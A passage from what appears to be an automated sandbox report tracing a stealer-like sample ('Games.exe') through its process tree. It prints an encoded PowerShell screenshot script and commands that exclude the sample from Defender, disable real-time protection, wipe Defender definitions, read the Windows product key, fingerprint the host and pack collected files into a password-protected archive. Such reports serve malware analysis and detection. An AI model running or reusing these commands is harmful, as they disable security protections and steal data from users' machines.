lAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2244
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hcdf2vmx\hcdf2vmx.cmdline"
        5⤵
        
        PID:3320
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB5D3.tmp" "c:\Users\Admin\AppData\Local\Temp\hcdf2vmx\CSCBD6142B5E82246FF9AF774635E339CD.TMP"
        6⤵
        
        PID:1204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1848
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4232
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3484
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4612
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4576
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4584
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:2288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI45362\rar.exe a -r -hp"10241317" "C:\Users\Admin\AppData\Local\Temp\9D9d7.zip" *"
    3⤵
    PID:3060
  - - C:\Users\Admin\AppData\Local\Temp\_MEI45362\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI45362\rar.exe a -r -hp"10241317" "C:\Users\Admin\AppData\Local\Temp\9D9d7.zip" *
      4⤵
      Executes dropped EXE
      PID:4352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3840
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2120
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:3784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1628
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:1880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3096
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1440
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:5104
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4776

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa248a46f8,0x7ffa248a4708,0x7ffa248a4718
  2⤵
  PID:540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,14714651981258350319,4192104759316408103,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
  2⤵
  PID:1848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,14714651981258350319,4192104759316408103,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,14714651981258350319,4192104759316408103,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
  2⤵
  PID:5000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,14714651981258350319,4192104759316408103,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
  2⤵
  PID:4820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,14714651981258350319,4192104759316408103,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
  2⤵
  PID:4828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,14714651981258350319,4192104759316408103,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
  2⤵
  PID:3720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,14714651981258350319,4192104759316408103,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1
  2⤵
  PID:5032
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,14714651981258350319,4192104759316408103,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3600 /prefetch:8
  2⤵
  PID:2804
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,14714651981258350319,4192104759316408103,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3600 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,14714651981258350319,4192104759316408103,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
  2⤵
  PID:512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,14714651981258350319,4192104759316408103,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:1
  2⤵
  PID:380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,14714651981258350319,4192104759316408103,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1
  2⤵
  PID:4268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,14714651981258350319,4192104759316408103,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1
  2⤵
  PID:3764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,14714651981258350319,4192104759316408103,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:1
  2⤵
  PID:4572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,14714651981258350319,4192104759316408103,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1
  2⤵
  PID:3768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,14714651981258350319,4192104759316408103,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:1
  2⤵
  PID:4244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,14714651981258350319,4192104759316408103,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
  2⤵
  PID:2304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,14714651981258350319,4192104759316408103,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
  2⤵
  PID:1392

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4532

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1208

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa248a46f8,0x7ffa248a4708,0x7ffa248a4718
  2⤵
  PID:2476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
  2⤵
  PID:376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2964 /prefetch:8
  2⤵
  PID:2648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
  2⤵
  PID:3792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
  2⤵
  PID:2420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1
  2⤵
  PID:3140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4232 /prefetch:1
  2⤵
  PID:1836
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3452 /prefetch:8
  2⤵
  PID:2892
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3452 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
  2⤵
  PID:4544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
  2⤵
  PID:2412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
  2⤵
  PID:4780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:1
  2⤵
  PID:2872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:1
  2⤵
  PID:3540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
  2⤵
  PID:1480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:1
  2⤵
  PID:1192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1
  2⤵
  PID:940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1
  2⤵
  PID:3724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5384 /prefetch:8
  2⤵
  PID:4064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
  2⤵
  PID:672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5192 /prefetch:8
  2⤵
  PID:3276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2032,13207190787042898299,5409091781250748084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2736
- C:\Users\Admin\Downloads\Games.exe
  "C:\Users\Admin\Downloads\Games.exe"
  2⤵
  - Executes dropped EXE
  PID:4496
- - C:\Users\Admin\Downloads\Games.exe
    "C:\Users\Admin\Downloads\Games.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1864
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Games.exe'"
      4⤵
      PID:1860
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Games.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2428
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:452
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:216
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:768
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:756
    - - C:\Windows\system32\tasklist.exe
        
